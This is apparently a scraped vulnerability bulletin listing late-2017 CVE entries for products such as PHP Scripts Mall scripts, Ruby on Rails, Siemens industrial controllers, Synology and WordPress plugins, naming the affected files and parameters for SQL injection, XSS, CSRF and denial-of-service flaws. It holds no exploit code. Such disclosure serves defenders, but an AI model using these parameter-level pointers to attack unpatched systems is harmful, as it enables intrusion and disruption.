 		PHP Scripts Mall Professional Service Script has XSS via the admin/general_settingupd.php website_title parameter.2017-12-27not yet calculatedCVE-2017-17925
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script allows remote attackers to obtain sensitive full-path information via the id parameter to admin/review_userwise.php.2017-12-27not yet calculatedCVE-2017-17924
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script has CSRF via admin/general_settingupd.php, as demonstrated by modifying a setting in the user panel.2017-12-27not yet calculatedCVE-2017-17930
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script has SQL injection via the admin/review.php id parameter.2017-12-27not yet calculatedCVE-2017-17928
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script allows remote attackers to obtain sensitive full-path information via a crafted PATH_INFO to service-list/category/.2017-12-27not yet calculatedCVE-2017-17927
MISC
phpscriptsmall.com -- php_scripts_mall_responsive_realestate_script
 		PHP Scripts Mall Responsive Realestate Script has CSRF via admin/general.2017-12-27not yet calculatedCVE-2017-17908
MISC
phpscriptsmall.com -- php_scripts_mall_responsive_realestate_script
 		PHP Scripts Mall Responsive Realestate Script has XSS via the admin/general.php gplus parameter.2017-12-27not yet calculatedCVE-2017-17909
MISC
phpscriptsmall.com -- php_scripts_mall_resume_clone_script
 		PHP Scripts Mall Resume Clone Script has SQL Injection via the forget.php username parameter.2017-12-27not yet calculatedCVE-2017-17931
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_bookingPHP Scripts Mall Single Theater Booking has SQL Injection via the admin/movieview.php movieid parameter.2017-12-28not yet calculatedCVE-2017-17941
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_bookingPHP Scripts Mall Single Theater Booking has XSS via the title parameter to admin/sitesettings.php.2017-12-28not yet calculatedCVE-2017-17940
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_booking
 		PHP Scripts Mall Single Theater Booking has XSS via the admin/viewtheatre.php theatreid parameter.2017-12-28not yet calculatedCVE-2017-17938
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_booking
 		PHP Scripts Mall Single Theater Booking has CSRF via admin/sitesettings.php.2017-12-28not yet calculatedCVE-2017-17939
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 		Readymade Video Sharing Script has XSS via the search_video.php search parameter, the viewsubs.php chnlid parameter, or the user-profile-edit.php fname parameter.2017-12-27not yet calculatedCVE-2017-17893
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 		Readymade Video Sharing Script has SQL Injection via the viewsubs.php chnlid parameter or the search_video.php search parameter.2017-12-27not yet calculatedCVE-2017-17892
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 		Readymade Video Sharing Script has CSRF via user-profile-edit.php.2017-12-27not yet calculatedCVE-2017-17891
MISC
phpscriptssmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script has XSS via the admin/bannerview.php view parameter.2017-12-27not yet calculatedCVE-2017-17929
MISC
phpscriptssmall.com -- php_scripts_mall_professional_services_script
 		PHP Scripts Mall Professional Service Script has a predicable registration URL, which makes it easier for remote attackers to register with an invalid or spoofed e-mail address.2017-12-27not yet calculatedCVE-2017-17926
MISC
rawstudio -- rawstudio
 		The rs_filter_graph function in librawstudio/rs-filter.c in rawstudio might allow local users to truncate arbitrary files via a symlink attack on (1) /tmp/rs-filter-graph.png or (2) /tmp/rs-filter-graph.2017-12-29not yet calculatedCVE-2014-4978
FEDORA
MLIST
BID
CONFIRM
CONFIRM
XF
CONFIRM
red_hat -- hawt.io 
 		The admin terminal in Hawt.io does not require authentication, which allows remote attackers to execute arbitrary commands via the k parameter.2017-12-29not yet calculatedCVE-2014-0121
CONFIRM
CONFIRM
MISC
red_hat -- hawt.io 
 		Cross-site request forgery (CSRF) vulnerability in the admin terminal in Hawt.io allows remote attackers to hijack the authentication of arbitrary users for requests that run commands on the Karaf server, as demonstrated by running "shutdown -f."2017-12-29not yet calculatedCVE-2014-0120
CONFIRM
CONFIRM
MISC
red_hat -- fedora
 		The find_ifcfg_path function in netcf before 0.2.7 might allow attackers to cause a denial of service (application crash) via vectors involving augeas path expressions.2017-12-29not yet calculatedCVE-2014-8119
FEDORA
FEDORA
FEDORA
REDHAT
BID
CONFIRM
CONFIRM
red_lion -- hmi_panels
 		Red Lion HMI panels allow remote attackers to cause a denial of service (software exception) via an HTTP POST request to a long URI that does not exist, as demonstrated by version HMI 2.41 PLC 2.42.2017-12-30not yet calculatedCVE-2017-14855
MISC
rockwell_automation -- factorytalk_alarms_and_events
 		An Improper Input Validation issue was discovered in Rockwell Automation FactoryTalk Alarms and Events, Version 2.90 and earlier. An unauthenticated attacker with remote access to a network with FactoryTalk Alarms and Events can send a specially crafted set of packets packet to Port 403/TCP (the history archiver service), causing the service to either stall or terminate.2017-12-22not yet calculatedCVE-2017-14022
BID
MISC
ruby_on_rails -- ruby_on_rails SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter.2017-12-29not yet calculatedCVE-2017-17919
MISC
ruby_on_rails -- ruby_on_rails 
 		SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter.2017-12-29not yet calculatedCVE-2017-17917
MISC
ruby_on_rails -- ruby_on_rails 
 		SQL injection vulnerability in the 'find_by' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter.2017-12-29not yet calculatedCVE-2017-17916
MISC
ruby_on_rails -- ruby_on_rails 
 		SQL injection vulnerability in the 'reorder' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter.2017-12-29not yet calculatedCVE-2017-17920
MISC
samsung -- internet_browser
 		Samsung Internet Browser 6.2.01.12 allows remote attackers to bypass the Same Origin Policy, and conduct UXSS attacks to obtain sensitive information, via vectors involving an IFRAME element inside XSLT data in one part of an MHTML file. Specifically, JavaScript code in another part of this MHTML file does not have a document.domain value corresponding to the domain that is hosting the MHTML file, but instead has a document.domain value corresponding to an arbitrary URL within the content of the MHTML file.2017-12-27not yet calculatedCVE-2017-17859
MISC
samsung -- s6_edge
 		The SecEmailComposer/EmailComposer application in the Samsung S6 Edge before the October 2015 MR uses weak permissions for the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND service action, which might allow remote attackers with knowledge of the local email address to obtain sensitive information via a crafted application that sends a crafted intent.2017-12-27not yet calculatedCVE-2015-7889
MISC
BID
CONFIRM
EXPLOIT-DB
serverscheck_monitoring_software -- serverscheck_monitoring_software
 		ServersCheck Monitoring Software before 14.2.3 is prone to a cross-site scripting vulnerability as user supplied-data is not validated/sanitized when passed in the settings_SMS_ALERT_TYPE parameter, and JavaScript can be executed on settings-save.html (the Settings - SMS Alerts page).2017-12-27not yet calculatedCVE-2017-17832
MISC
CONFIRM
siemens -- 7kt_pac1200_data_manager
 		A vulnerability has been identified in Siemens 7KT PAC1200 data manager (7KT1260) in all versions < V2.03. The integrated web server (port 80/tcp) of the affected devices could allow an unauthenticated remote attacker to perform administrative operations over the network.2017-12-27not yet calculatedCVE-2017-9944
BID
CONFIRM
siemens -- logo!_soft_comfort
 		Siemens LOGO! Soft Comfort (All versions before V8.2) lacks integrity verification of software packages downloaded via an unprotected communication channel. This could allow a remote attacker to manipulate the software package while performing a Man-in-the-Middle (MitM) attack.2017-12-25not yet calculatedCVE-2017-12740
CONFIRM
siemens -- multiple_products
 		A vulnerability has been identified in the following Siemens industrial products: SIMATIC S7-200 Smart: All versions < V2.03.01, SIMATIC S7-400 PN V6: All versions < V6.0.6, SIMATIC S7-400 H V6: All versions < 6.0.8, SIMATIC S7-400 PN/DP V7: All versions, SIMATIC S7-410 V8: All versions, SIMATIC S7-300: All versions, SIMATIC S7-1200: All versions, SIMATIC S7-1500: All versions < 2.0, SIMATIC S7-1500 Software Controller: All versions < 2.0, SIMATIC WinAC RTX 2010 incl. F: All versions, SIMATIC ET 200AL: All versions, SIMATIC ET 200ecoPN: All versions, SIMATIC ET 200M: All versions, SIMATIC ET 200MP: All versions, SIMATIC ET 200pro: All versions, SIMATIC ET 200S: All versions, SIMATIC ET 200SP: All versions, DK Standard Ethernet Controller: All versions, EK-ERTEC 200P: All versions < V4.5, EK-ERTEC 200 PN IO: All versions, SIMOTION D: All versions < V5.1 HF1, SIMOTION C: All versions < V5.1 HF1, SIMOTION P: All versions < V5.1 HF1, SINAMICS DCM: All versions, SINAMICS DCP: All versions, SINAMICS G110M / G120(C/P/D) w. PN: All versions < V4.7 SP9 HF1, SINAMICS G130 and G150: All versions, SINAMICS S110 w. PN: All versions, SINAMICS S120: All versions, SINAMICS S150 V4.7 and V4.8: All versions, SINAMICS V90 w. PN: All versions, SINUMERIK 840D sl: All versions, SIMATIC Compact Field Unit: All versions, SIMATIC PN/PN Coupler: All versions, SIMOCODE pro V PROFINET: All versions, SIRIUS Soft starter 3RW44 PN: All versions. Specially crafted packets sent to port 161/UDP could cause a Denial-of-Service condition. The affected devices must be restarted manually.2017-12-25not yet calculatedCVE-2017-12741
BID
CONFIRM
siemens -- ruggedcom_ros_for_rsl910_devices
 		A vulnerability has been identified in the following Siemens products: RUGGEDCOM ROS for RSL910 devices: All versions < ROS v5.0.1, RUGGEDCOM ROS for all other devices: All versions < ROS v4.3.4, SCALANCE XB-200/XC-200/XP-200/XR300-WG: All versions >= v3.0, SCALANCE XR-500/XM-400: All versions >= v6.1. After initial configuration, the Ruggedcom Discovery Protocol (RCDP) is still able to write to the device under certain conditions, potentially allowing users located in the adjacent network of the targeted device to perform unauthorized administrative actions.2017-12-25not yet calculatedCVE-2017-12736
BID
SECTRACK
SECTRACK
CONFIRM
software_house -- istar_ultra_devices
 		A door-unlocking issue was discovered on Software House iStar Ultra devices through 6.5.2.20569 when used in conjunction with the IP-ACM Ethernet Door Module. The communications between the IP-ACM and the iStar Ultra is encrypted using a fixed AES key and IV. Each message is encrypted in CBC mode and restarts with the fixed IV, leading to replay attacks of entire messages. There is no authentication of messages beyond the use of the fixed AES key, so message forgery is also possible.2017-12-30not yet calculatedCVE-2017-17704
MISC
sony -- playstation
 		Untrusted search path vulnerability in Content Manager Assistant for PlayStation version 3.55.7671.0901 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-27not yet calculatedCVE-2017-17010
JVN
synology -- mailplus_server
 		Cross-site scripting (XSS) vulnerability in User Policy editor in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary HTML via the name parameter.2017-12-27not yet calculatedCVE-2017-16768
CONFIRM
synology -- synology_chat
 		Multiple cross-site scripting (XSS) vulnerabilities in Slash Command Creator in Synology Chat before 2.0.0-1124 allow remote authenticated users to inject arbitrary web script or HTML via (1) COMMAND, (2) COMMANDS INSTRUCTION, or (3) DESCRIPTION parameter.2017-12-28not yet calculatedCVE-2017-15892
CONFIRM
synology -- synology_chat
 		Server-side request forgery (SSRF) vulnerability in Link Preview in Synology Chat before 2.0.0-1124 allows remote authenticated users to download arbitrary local files via a crafted URI.2017-12-28not yet calculatedCVE-2017-15886
CONFIRM
tripwire -- ip360_vne_manager
 		The RPC service in Tripwire (formerly nCircle) IP360 VnE Manager 7.2.2 before 7.2.6 allows remote attackers to bypass authentication and (1) enumerate users, (2) reset passwords, or (3) manipulate IP filter restrictions via crafted "privileged commands."2017-12-27not yet calculatedCVE-2015-6237
FULLDISC
BUGTRAQ
typo3 -- typo3
 		The Direct Mail (direct_mail) extension before 3.1.2 for TYPO3 allows remote attackers to obtain sensitive information by leveraging improper checking of authentication codes.2017-12-29not yet calculatedCVE-2013-7400
MLIST
CONFIRM
MISC
ubiquiti -- unifi_video
 		Ubiquiti UniFi Video before 3.8.0 for Windows uses weak permissions for the installation directory, which allows local users to gain SYSTEM privileges via a Trojan horse taskkill.exe file.2017-12-27not yet calculatedCVE-2016-6914
MISC
FULLDISC
BID
MISC
EXPLOIT-DB
valve_steam_link -- valve_steam_link_build_643
 		An issue was discovered in Valve Steam Link build 643. Root passwords longer than 8 characters are truncated because of the default use of DES (aka the CONFIG_FEATURE_DEFAULT_PASSWD_ALGO="des" setting).2017-12-27not yet calculatedCVE-2017-17878
MISC
MISC
MISC
valve_steam_link -- valve_steam_link_build_643
 		An issue was discovered in Valve Steam Link build 643. When the SSH daemon is enabled for local development, the device is publicly available via IPv6 TCP port 22 over the internet (with stateless address autoconfiguration) by default, which makes it easier for remote attackers to obtain access by guessing 24 bits of the MAC address and attempting a root login. This can be exploited in conjunction with CVE-2017-17878.2017-12-27not yet calculatedCVE-2017-17877
MISC
MISC
MISC
vanguard -- marketplace_digital_products_php
 		Vanguard Marketplace Digital Products PHP has CSRF via /search.2017-12-28not yet calculatedCVE-2017-17936
MISC
vanguard -- marketplace_digital_products_php
 		Vanguard Marketplace Digital Products PHP 1.4 allows arbitrary file upload via an "Add a new product" or "Add a product preview" action, which can make a .php file accessible under a uploads/ URI.2017-12-27not yet calculatedCVE-2017-17874
EXPLOIT-DB
vanguard -- marketplace_digital_products_php
 		Vanguard Marketplace Digital Products PHP 1.4 has SQL Injection via the PATH_INFO to the /p URI.2017-12-27not yet calculatedCVE-2017-17873
EXPLOIT-DB
vanguard -- marketplace_digital_products_php
 		Vanguard Marketplace Digital Products PHP has XSS via the phps_query parameter to /search.2017-12-28not yet calculatedCVE-2017-17937
MISC
webmin -- webmin
 		custom/run.cgi in Webmin before 1.870 allows remote authenticated administrators to conduct XSS attacks via the description field in the custom command functionality.2017-12-30not yet calculatedCVE-2017-17089
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.2.11 and before, the MRDISC dissector misuses a NULL pointer. This was addressed in epan/dissectors/packet-mrdisc.c by validating an IPv4 address. This vulnerability is similar to CVE-2017-9343.2017-12-30not yet calculatedCVE-2017-17997
MISC
MISC
MISC
wireshark -- wireshark
 		The File_read_line function in epan/wslua/wslua_file.c in Wireshark through 2.2.11 does not properly strip '\n' characters, which allows remote attackers to cause a denial of service (buffer underflow and application crash) via a crafted packet that triggers the attempted processing of an empty line.2017-12-27not yet calculatedCVE-2017-17935
BID
MISC
MISC
MISC
wordpress -- wordpressThe TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to obtain sensitive order detail information by leveraging a "broken authentication mechanism."2017-12-29not yet calculatedCVE-2015-3302
MISC
BUGTRAQ
BID
EXPLOIT-DB
MISC
wordpress -- wordpress
 		Multiple cross-site scripting (XSS) vulnerabilities in (1) templates/admanagement/admanagement.php and (2) templates/adspot/adspot.php in the ResAds plugin before 1.0.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the page parameter.2017-12-27not yet calculatedCVE-2015-7667
BUGTRAQ
CONFIRM
MISC
wordpress -- wordpress
 		The mgl-instagram-gallery plugin for WordPress has XSS via the single-gallery.php media parameter.2017-12-27not yet calculatedCVE-2017-17869
MISC
wordpress -- wordpress
 		Multiple cross-site scripting (XSS) vulnerabilities in the (1) cp_updateMessageItem and (2) cp_deleteMessageItem functions in cp_ppp_admin_int_message_list.inc.php in the Payment Form for PayPal Pro plugin before 1.0.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the cal parameter.2017-12-27not yet calculatedCVE-2015-7666
BUGTRAQ
CONFIRM
CONFIRM
MISC
wordpress -- wordpress
 		Multiple directory traversal vulnerabilities in (1) includes/MapImportCSV2.php and (2) includes/MapImportCSV.php in the Easy2Map plugin before 1.3.0 for WordPress allow remote attackers to include and execute arbitrary files via the csvfile parameter related to "upload file functionality."2017-12-27not yet calculatedCVE-2015-7669
BUGTRAQ
CONFIRM
MISC
wordpress -- wordpress
 		Cross-site scripting (XSS) vulnerability in includes/MapPinImageSave.php in the Easy2Map plugin before 1.3.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter.2017-12-27not yet calculatedCVE-2015-7668
BUGTRAQ
CONFIRM
MISC
zend_framework -- zend_framework
 		The Zend_Db_Select::order function in Zend Framework before 1.12.7 does not properly handle parentheses, which allows remote attackers to conduct SQL injection attacks via unspecified vectors.2017-12-29not yet calculatedCVE-2014-4914
CONFIRM
JVN
MLIST
SECUNIA
BID
DEBIAN
zyxel -- p-660hw_v3_devices
 		ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via a flood of IP packets with a TTL of 1.2017-12-29not yet calculatedCVE-2017-17901
MISC
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


Viewing all 3440 articles
Browse latest View live
Search